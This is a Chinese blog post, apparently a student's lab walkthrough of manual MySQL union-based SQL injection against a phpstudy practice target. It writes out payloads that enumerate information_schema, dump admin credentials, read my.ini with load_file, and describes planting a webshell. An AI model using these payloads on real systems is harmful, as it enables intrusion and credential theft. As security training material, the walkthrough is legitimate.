mysql 报错注入写文件_大哥带我们的mysql注入

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量326 收藏
点赞数
文章标签: mysql 报错注入写文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39718006/article/details/113440154
版权
本文介绍了手工进行MySQL注入的过程,包括如何找出admin用户的密码,读取phpstudy的my.ini配置文件,以及通过注入点写入webshell。通过union select语句、load_file函数和路径构造,逐步展示了每个步骤的技术细节和解决方法。
摘要由CSDN通过智能技术生成

这是今天的任务

任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell,  都是要求手工,具体方法自己百度mysql5注入相关内容

union select 1,2,3,4,5

6f6fcdca777bc578f8c8f62660a2a0f4.png

查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入

http://www.萨达所大大所多t/index.php?id=1%20order%20by%205

aedeb6c31e1e749d6940478b66a3b333.png

数据库test

查询所有数据库

网址+union select 1,2,3,4,schema_name from information_schema.schemata

c6998cbdbaf9df9c6bdcfdd20e6b1074.png

要求是读取web端口的admin密码 那我们应该进入test数据库

爆表名

网站+union select 1,2,3,4,table_name from information_schema.tables where table_schema='test'

这里原来的语句已经闭合 不需要你去闭合了

6346175651ea5ed27582f27b7db69c0b.png

看见有admin表之后继续爆列名

union select 1,2,3,4,column_name from information_schema.columns where table_name='admin'

8b270a4d8fcef2f6f6def52e128ca5be.png

看见有username 和password应该就是我们要爆破的字段名 来爆破吧

网站+union select username,password,3,4,5 from admin

720d715d3b65fd485ccb94cb7b5a3653.png

这个应该就是我们要爆破的数据 admin admin888

0X02读取靶机phpstudy里面mysql的my.ini这个文件

那有注入点 我们看看是否有读写文件的权限呐? 因为这里的user()是root那我们就有读取文件的权限了

1、必须有权限读取并且文件必须完全可读。

and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/

and (select count(*) from mysql.user)>0 /* 返回错误,应该是管理员给数据库账户降权了*/

2、欲读取文件必须在服务器上

3、必须指定文件完整的路径

4、欲读取文件必须小于max_allowed_packet

如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限。

在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到administrators才能访问的文件,

users就不能实现用load_file读取文件了。

利用需要满足以下条件:

1.root权限

2.GPC关闭(能使用单引号)

3.有绝对路径(读文件可以不用,写文件必须)

4.没有配置—secure-file-priv

88c00b3a465ea8f203fa73c641811e14.png

那么权限够了 路径怎么办呐??????

两个函数的介绍

@@datadir 读取数据库路径

@@basedir MYSQL 获取安装路径

union select user(),2,3,@@datadir,@@basedir

4b6a5c6103c80dac961ae3f4098f1040.png

好像找到路径了E:\phpstudy\MySQL\data\ 那我们看看mysql的my.ini文件一般在哪个文件夹下面 去百度一下

这里分享这个

https://blog.csdn.net/jiangyu1013/article/details/79792708

那更据他的理解路径应该是 E:\phpstudy\MySQL\data\my.ini

那我们就具备读文件的权限了

构造语句 这里第一次构造的路径是\一个斜杠的 不知道为什么不行 网上说两个斜杠就好 我就去试了一下

网址+%20union%20select%20load_file(%27E:\\phpstudy\\MySQL\\my.ini%27),2,3,4,5

e62b16b97927be90a70ca93e1a0a8747.png

成功读取文件

0X03写入自己的webshell

那么这个要满足的条件就更多了

没有配置—secure-file-priv 这个是什么东西呐?看看下面这个博客

https://blog.csdn.net/qq_41173457/article/details/81264564

好咯 回归正题

尝试一下嘛先 管他配没配置 但是一般这个网页的路径在哪里呐?

我们只是知道mysql的路径的啊 提示告诉我们是phpstudy 我们看看自己的phpstudy mysql和WWW同目录

77c41ee1015eb961bd130d4a872d6af8.png

那我们来尝试一下吧

我的天 过滤了  那我们尝试一下16进制直接写入吧

d6a9b60ae67be267c325e6b6dbdb55cc.png

而且好像还把目录报错出来了

我们的目录写错了应该是E:\phpstudy\WWW\sqli-one\

但是还是会报错

https://blog.csdn.net/qianduan520/article/details/52383214

这篇文章给大家解释的很清楚了

跟着改就行

然后就会成功

13ffe6f9214e6059f1cc9009fdeee5ff.png

致谢--- 卿哥

加油努力!!!

weixin_39718006
关注
69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入文件]
qwsn
01-18 2190
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、报错注入-读取文件 1、extractvalue()/exp() 读取文件 二、报错注入-伪写入文件 1、exp()伪写入文件
MYSQL报错注入
聚鼎安全
01-08 3566
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
mysql 报错注入文件_mysql注入总结
weixin_29802461的博客
01-26 544
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*—2.过滤空格注入使用/**/或()或+代替空格%0c = f...
SQL注入-文件
最新发布
m0_73902453的博客
07-25 1047
就是利用文件的读权限进行注入,它可以入一句话木马,也可以读取系统文件的敏感信息。
Mysql注入文件
qq_43776408的博客
06-05 533
Mysql注入文件 对于第二种方法 你可以直接打开my.ini配置文件 将该变量的值设置为空 记住 my.ini文件的内容有先后之分的 程序从上到下依次执行 mysql文件 select load_file(“F:\1.txt”); 接下来我们使用Less-1来 第一步肯定要判断几个字段 使用order by id来判断 id=1’ order by 3 --+ 如果正确,但是id为4时就错误了 所以有3个字段 知道有几个字段之后才可以进行联合查询 也就是利用union select 上图unio
Mysql报错注入详解.docx
11-20
以下是对MySQL报错注入的详细解释: ### 前言 在某些情况下,常规的SQL注入方法,如UNION查询,可能无法用于获取数据,因为数据源不受用户输入控制。但当输入特定字符,如单引号,导致系统报错并显示信息时,报错...
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
MYSQL报错注入杂记
gam0n的博客
08-29 207
元数据库information_schema 在5.0以后版本的MYSQL中存在着一个元数据information_schema,其中存储着用户在MYSQL中创建的所有其他数据库的信息。 当对PHP+MYSQL类网站进行注入时,主要是针对information_schema数据库进行操作; 比较重要的数据表: schema:用于存放所有数据库的名字; tables:用于存放所有数据...
[mysql][sql注入]读文件
qq_37301470的博客
11-14 267
secure_file_priv 全局变量 mysql> show variables like "%secure_file%" -> ; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+ 1 row in set, 1 warning (0.00
MySql入中文错误解决
11-14
MySql入中文错误解决办法,对于导入中文, 数据老是报错"Data too long for column XX at row n"
sql注入之读文件案例实验
千寻的博客
02-21 553
文章目录环境搭建第一节 前提条件第二节 读取文件操作第三节 写入文件操作免责声明 环境搭建 Window-server2008 —phpstudy-----搭建自己的网页 第一节 前提条件 我们也可以利用SQL 注入漏洞读文件。但是读文件需要一定的条件。 1.secure-file-priv 改参数可以在my.ini 配置文件中[mysqld] 下。若要配置此参数,需要修改my.ini ...
【SQL注入-文件文件的读取+入:函数、使用方法
05-30 9345
【SQL注入文件
SQL注入入Webshell(Lines terminated by入)
faclon666的博客
03-31 775
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来入webshell。1.当mysql注入点为盲注或报错,Union select入是不能利用的,那么可以通过分隔符入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
一次靶机入webshell的几种方式
u2943013702的博客
04-16 909
访问该路径,自动下载了www.zip文件,打开查看是网站的源码,那么这个应该是网站的备份源码,不知道是那个管理员放在了网站根目录,在源码的配置文件里得到了数据库的root和密码。数据库管理phpmyadmin后台拿到shell的方法有两种,一种是into outfile 直接入,一种是通过日志入。接下来按照传统的思想,查找表名,查找列,最后得到了网站管理员的账号和密码。这是一个由phpstudy搭建的站点的网站,尝试构造默认的网站根目录。更改路径为我们得到的绝对路径,也就是入shell文件的位置。
MySQL注入入WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
知识总结 | 注入webshell
IerkeU的博客
03-25 3552
一、什么是webshell? ​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。 ​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。 一句话木马 ​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此 简
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值